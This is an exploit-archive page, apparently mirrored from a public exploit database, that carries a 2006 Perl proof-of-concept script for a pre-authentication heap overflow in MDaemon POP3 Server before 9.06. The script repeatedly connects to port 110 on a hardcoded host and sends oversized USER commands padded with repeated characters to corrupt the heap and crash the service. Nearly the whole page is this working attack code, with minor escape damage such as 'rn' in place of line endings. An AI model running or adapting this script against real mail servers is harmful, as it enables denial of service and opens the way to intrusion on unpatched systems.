MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC
# Published : 2006-08-22
# Author : Leon Juranic
# Previous Title : Mozilla Firefox <= 1.5.0.6 (FTP Request) Remote Denial of Service Exploit
# Next Title : 2wire Modems/Routers CRLF Denial of Service Exploit

#
# PoC for Mdaemon POP3 preauth heap overflow
#
# Coded by Leon Juranic <leon.juranic@infigo.hr>
# Infigo IS <http://www.infigo.hr>
# 
#

$host = '192.168.0.105';

use IO::Socket;

for ($x = 0 ; $x < 12 ; $x++)
{
	$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp') 
	|| die "socket errornn";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "@A" x 160 . "rn";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "QUITrn";
	recv ($sock, $var, 10000,0);
	print $var;
	close ($sock);
	sleep(1);
}
	$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp') 
	|| die "socket errornn";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "@A@A" . "B" x 326 . "rn";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "'A" x  337 . "rn";
	recv ($sock, $var, 10000,0);
	print $var;
	sleep(2);

# www.Syue.com [2006-08-22]